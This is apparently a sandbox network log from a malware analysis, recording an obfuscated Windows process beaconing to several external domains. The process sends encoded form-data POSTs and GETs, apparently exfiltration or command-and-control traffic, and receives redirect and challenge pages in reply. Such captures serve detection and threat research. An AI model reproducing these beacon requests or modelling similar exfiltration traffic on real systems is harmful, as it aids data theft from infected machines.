Session ID: 11 | Source IP: 192.168.2.5 | Source Port: 49878 | Destination IP: 185.27.134.206 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp: Nov 20, 2024 21:09:50.828082085 CET | Bytes transferred: 1692 | Direction: OUT
POST /g3h7/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Length: 1242
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Host: www.canadavinreport.site
Origin: http://www.canadavinreport.site
Referer: http://www.canadavinreport.site/g3h7/
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Data Ascii: sVC8z= [TRUNCATED]
Timestamp: Nov 20, 2024 21:09:52.156817913 CET | Bytes transferred: 683 | Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 20:09:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Content-Encoding: br
Data Ascii: 1b98 rrd7EsNtYr'\usxMk $0IjxI-vc|`,"p!"J aI;C]$6BVN%J-b?LJ]zw7+qP-Ucc%E>%!/h%x{Z0B-:IRE&!!&,<,l&e^J.d*JarJ@qejr2)w<!<IC-N]L)1_P|7]FXcP+U K$k4k<+@q`>W)OQ~:Y.{*./vBW}=L6B*+)mQZL84S0


Session ID: 12 | Source IP: 192.168.2.5 | Source Port: 49882 | Destination IP: 185.27.134.206 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp: Nov 20, 2024 21:09:53.479079008 CET | Bytes transferred: 377 | Direction: OUT
GET /g3h7/?sVC8z=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&PPP=FHWL56 HTTP/1.1
Accept: */*
Accept-Language: en-US
Connection: close
Host: www.canadavinreport.site
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Timestamp: Nov 20, 2024 21:09:54.725383997 CET | Bytes transferred: 1191 | Direction: IN
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 20:09:54 GMT
Content-Type: text/html
Content-Length: 990
Connection: close
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("4e94f4f2aef4bd3955ed01fff4012ffc");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/g3h7/?sVC8z=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&PPP=FHWL56&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


Session ID: 13 | Source IP: 192.168.2.5 | Source Port: 49899 | Destination IP: 106.15.109.33 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp: Nov 20, 2024 21:10:00.725912094 CET | Bytes transferred: 634 | Direction: OUT
POST /t322/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Length: 206
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Host: www.yunlekeji.top
Origin: http://www.yunlekeji.top
Referer: http://www.yunlekeji.top/t322/
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Data Ascii: sVC8z=IA33BtMMTtUPeH/m+WeyPdo7XZoPCzqCmxS0ZyvmgEp3FKwkjSKnmtC4OV+lByI5QSH1ozIX+/2a5kXadTX6WfFgvP3xbvbrl/KeF4WmExg+CVCDHjanIYLF8a31xulbRZqSpEEI/mfC/MugUrWUf7ISR6tMc6Vb70N9et67JYVYTLiFBk6IQWNy4FpjgFezxYodNao=


Session ID: 14 | Source IP: 192.168.2.5 | Source Port: 49905 | Destination IP: 106.15.109.33 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp: Nov 20, 2024 21:10:03.389355898 CET | Bytes transferred: 654 | Direction: OUT
POST /t322/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Length: 226
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Host: www.yunlekeji.top
Origin: http://www.yunlekeji.top
Referer: http://www.yunlekeji.top/t322/
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Data Ascii: sVC8z=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgSx3FqgkiTKnhtC4dV/vPSIuQSDXo2IX++Wa5lHadgP5XPFinv33VPbrl/KeF4qcExo+CgSDHGmgJYLE7a317OkSRZqspBcu/lnC/P6gV+iXU7JbJasjN74/7Gd3BPvtQ517fdTvbGygD2hKoWhUx1/ar74tTN+0+LtBY66WBD3gvJjPGVCR


Session ID: 15 | Source IP: 192.168.2.5 | Source Port: 49913 | Destination IP: 106.15.109.33 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp: Nov 20, 2024 21:10:06.054174900 CET | Bytes transferred: 1671 | Direction: OUT
POST /t322/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Length: 1242
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Host: www.yunlekeji.top
Origin: http://www.yunlekeji.top
Referer: http://www.yunlekeji.top/t322/
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Data Ascii: sVC8z= [TRUNCATED]


Session ID: 16 | Source IP: 192.168.2.5 | Source Port: 49920 | Destination IP: 106.15.109.33 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp: Nov 20, 2024 21:10:08.716196060 CET | Bytes transferred: 370 | Direction: OUT
GET /t322/?PPP=FHWL56&sVC8z=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XX9RPs5/iUffq0tmKE8rYJBtcI2bhCRGcMbzPlb/C9uxVPg== HTTP/1.1
Accept: */*
Accept-Language: en-US
Connection: close
Host: www.yunlekeji.top
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Timestamp: Nov 20, 2024 21:10:11.431771994 CET | Bytes transferred: 1236 | Direction: IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 20 Nov 2024 20:10:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Data Ascii: 19f2<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>系统发生错误</title> <meta name="robots" content="noindex,nofollow" /> <style> /* Base */ body { color: #333; font: 16px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-decoration: underline; text-decoration-style: dotted; } a{ color [TRUNCATED]
Timestamp: Nov 20, 2024 21:10:11.431813955 CET | Bytes transferred: 1236 | Direction: IN
Data Ascii: er; } a:hover{ text-decoration: underline; } .line-error{ background: #f8cbcb; } .echo table { width: 100%; } .echo pre { padding
Timestamp: Nov 20, 2024 21:10:11.431827068 CET | Bytes transferred: 1236 | Direction: IN
Data Ascii: border-radius: 4px; background: #999; } .exception .source-code{ padding: 6px; border: 1px solid #ddd; background: #f9f9f9; overflow-x: auto; }
Timestamp: Nov 20, 2024 21:10:11.431871891 CET | Bytes transferred: 1236 | Direction: IN
Data Ascii: x; font-size:14px; font-family: Consolas,"Liberation Mono",Courier,Verdana,""; } .exception .trace ol{ margin: 12px; } .exception .trace ol li{ padding: 2p
Timestamp: Nov 20, 2024 21:10:11.431885958 CET | Bytes transferred: 1236 | Direction: IN
Data Ascii: rd-break: break-all; } .exception-var table td:first-child{ width: 28%; font-weight: bold; white-space: nowrap; } .exception-var table td pre{ margin: 0; }
Timestamp: Nov 20, 2024 21:10:11.431896925 CET | Bytes transferred: 663 | Direction: IN
Data Ascii: alue */ pre.prettyprint .dec, pre.prettyprint .var { color: #606 } /* a declaration; a variable name */ pre.prettyprint .fun { color: red } /* a function name */ </style></head><body> <div class="echo">


Session ID: 17 | Source IP: 192.168.2.5 | Source Port: 49938 | Destination IP: 45.141.156.114 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp: Nov 20, 2024 21:10:17.119976044 CET | Bytes transferred: 631 | Direction: OUT
POST /iuvu/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Content-Length: 206
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Host: www.logidant.xyz
Origin: http://www.logidant.xyz
Referer: http://www.logidant.xyz/iuvu/
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Data Ascii: sVC8z=1E6C75TZpJNES7yxMKVrIHTDD2FAQWuWG/cLzxXmPhtVFngX1QThN5EIScfuJE+0RgftajC9h9Ju0tl4vsGJRVb9/VSS+4HAn5wjb6tvBJjY+uwMTwhXsw54G+Gz7Eyz2iuJb1jpBBdlWPJetqS6Ss4htZUo9fii3gOrUAC8KDIwUUgoz2tD9W/2iiJw7wb9kLGBVHE=
Timestamp: Nov 20, 2024 21:10:18.516494989 CET | Bytes transferred: 691 | Direction: IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 20 Nov 2024 20:10:18 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            18 | 192.168.2.5 | 49945 | 45.141.156.114 | 80 | 6576 | C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 20, 2024 21:10:19.784112930 CET | 651 | OUT | POST /iuvu/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.logidant.xyz
                                                            Origin: http://www.logidant.xyz
                                                            Referer: http://www.logidant.xyz/iuvu/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 62 43 78 4c 74 68 72 42 48 54 63 4e 57 46 41 65 32 76 66 47 2f 59 4c 7a 7a 36 37 4f 54 35 56 47 46 6f 58 30 53 72 68 41 5a 45 49 4b 4d 66 72 55 55 2b 39 52 67 54 66 61 6d 36 39 68 38 74 75 30 6f 68 34 76 62 79 4b 58 46 62 2f 33 31 53 55 77 59 48 41 6e 35 77 6a 62 36 34 41 42 4a 37 59 2b 2b 41 4d 53 54 35 59 6b 51 35 35 42 2b 47 7a 2f 45 79 33 32 69 75 52 62 33 62 54 42 48 5a 6c 57 4f 35 65 74 34 71 35 62 73 34 76 77 70 56 64 37 61 50 31 75 7a 2f 71 58 67 7a 75 63 43 63 4b 59 43 52 43 70 55 6c 72 75 32 54 4f 79 78 42 48 71 41 36 55 2b 6f 57 78 4c 51 51 4b 59 63 42 75 48 36 76 61 4a 67 72 41 6b 36 4b 61 50 59 46 55
                                                            Data Ascii: sVC8z=1E6C75TZpJNESbCxLthrBHTcNWFAe2vfG/YLzz67OT5VGFoX0SrhAZEIKMfrUU+9RgTfam69h8tu0oh4vbyKXFb/31SUwYHAn5wjb64ABJ7Y++AMST5YkQ55B+Gz/Ey32iuRb3bTBHZlWO5et4q5bs4vwpVd7aP1uz/qXgzucCcKYCRCpUlru2TOyxBHqA6U+oWxLQQKYcBuH6vaJgrAk6KaPYFU
                                                            Nov 20, 2024 21:10:21.084203005 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Wed, 20 Nov 2024 20:10:20 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 548
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            19 | 192.168.2.5 | 49952 | 45.141.156.114 | 80 | 6576 | C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 20, 2024 21:10:22.459631920 CET | 1668 | OUT | POST /iuvu/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 1242
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.logidant.xyz
                                                            Origin: http://www.logidant.xyz
                                                            Referer: http://www.logidant.xyz/iuvu/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 31 45 36 43 37 35 54 5a 70 4a 4e 45 53 62 43 78 4c 74 68 72 42 48 54 63 4e 57 46 41 65 32 76 66 47 2f 59 4c 7a 7a 36 37 4f 53 42 56 47 32 77 58 30 7a 72 68 42 5a 45 49 55 63 66 71 55 55 2f 2f 52 67 4c 62 61 6d 6d 44 68 2b 6c 75 79 4b 70 34 6e 4b 79 4b 65 46 62 2f 6f 6c 53 52 2b 34 48 5a 6e 39 63 6e 62 36 6f 41 42 4a 37 59 2b 34 6b 4d 47 77 68 59 69 51 35 34 47 2b 48 79 37 45 79 66 32 69 32 42 62 78 48 44 42 58 35 6c 58 74 42 65 76 4c 53 35 48 38 35 4a 67 35 56 46 37 61 4b 79 75 7a 69 52 58 67 32 37 63 45 73 4b 59 44 30 42 35 46 42 7a 7a 48 4c 7a 78 6a 35 52 32 31 69 69 38 4a 71 32 4e 6a 38 75 51 59 5a 2b 48 63 50 34 50 78 69 38 6d 75 4f 7a 47 4e 6f 46 5a 69 32 46 55 30 45 36 30 43 6c 39 54 6c 54 4d 35 4b 2b 2b 56 50 78 65 61 6a 39 53 34 6b 54 4b 69 6e 6b 4b 6a 50 6e 6e 6f 4f 53 2f 6e 30 53 52 4b 37 62 61 30 43 62 69 58 41 64 34 62 34 76 71 31 47 4e 6a 74 49 32 77 5a 69 38 74 6c 39 50 2b 30 77 33 4f 76 70 4b 78 6d 63 69 6b 42 31 7a 76 32 2f 74 54 31 38 6e 66 41 61 4a 49 6b 4a 51 6f [TRUNCATED]
                                                            Data Ascii: sVC8z=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 [TRUNCATED]
                                                            Nov 20, 2024 21:10:23.802182913 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Wed, 20 Nov 2024 20:10:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 548
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            20 | 192.168.2.5 | 49959 | 45.141.156.114 | 80 | 6576 | C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 20, 2024 21:10:25.119486094 CET | 369 | OUT | GET /iuvu/?sVC8z=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5ynY1PA81WB0aqcrP8TCrRqA4T6i/Y0YCRnlTl6YfLJ6nzbiw==&PPP=FHWL56 HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.logidant.xyz
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Nov 20, 2024 21:10:26.470025063 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Wed, 20 Nov 2024 20:10:26 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 548
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            21 | 192.168.2.5 | 49974 | 202.79.161.151 | 80 | 6576 | C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 20, 2024 21:10:32.564551115 CET | 631 | OUT | POST /36be/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 206
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.laohub10.net
                                                            Origin: http://www.laohub10.net
                                                            Referer: http://www.laohub10.net/36be/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 64 49 78 36 6f 50 76 73 4d 2b 30 43 6c 59 47 50 47 50 54 78 32 4e 6d 46 75 69 6b 75 41 56 71 4b 63 2b 4a 33 31 7a 49 4c 77 35 31 64 6c 64 42 35 73 4d 36 31 47 50 32 4b 38 72 6f 73 38 45 2b 71 2f 69 79 4a 42 66 34 39 33 41 56 45 70 2f 6a 4c 59 53 79 33 36 4f 7a 30 69 61 62 50 4e 5a 46 36 58 2f 77 46 4d 61 53 6f 58 48 33 54 67 32 66 70 6f 78 71 65 71 53 59 47 35 32 4b 39 74 32 2b 78 43 63 48 68 76 67 2b 4c 4e 73 6d 75 46 47 71 43 49 69 6f 54 4f 32 67 62 6f 71 4a 33 35 38 65 70 2b 75 73 45 31 64 4b 48 4c 71 35 79 42 79 41 71 55 6d 30 7a 36 75 61 44 70 78 55 3d
                                                            Data Ascii: sVC8z=+RW/B6W0fKmadIx6oPvsM+0ClYGPGPTx2NmFuikuAVqKc+J31zILw51dldB5sM61GP2K8ros8E+q/iyJBf493AVEp/jLYSy36Oz0iabPNZF6X/wFMaSoXH3Tg2fpoxqeqSYG52K9t2+xCcHhvg+LNsmuFGqCIioTO2gboqJ358ep+usE1dKHLq5yByAqUm0z6uaDpxU=
                                                            Nov 20, 2024 21:10:33.895478964 CET | 532 | IN | HTTP/1.1 200 OK
                                                            Server: Apache
                                                            Content-Type: text/html; charset=utf-8
                                                            Accept-Ranges: bytes
                                                            Cache-Control: max-age=86400
                                                            Age: 1
                                                            Connection: Close
                                                            Content-Length: 357
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
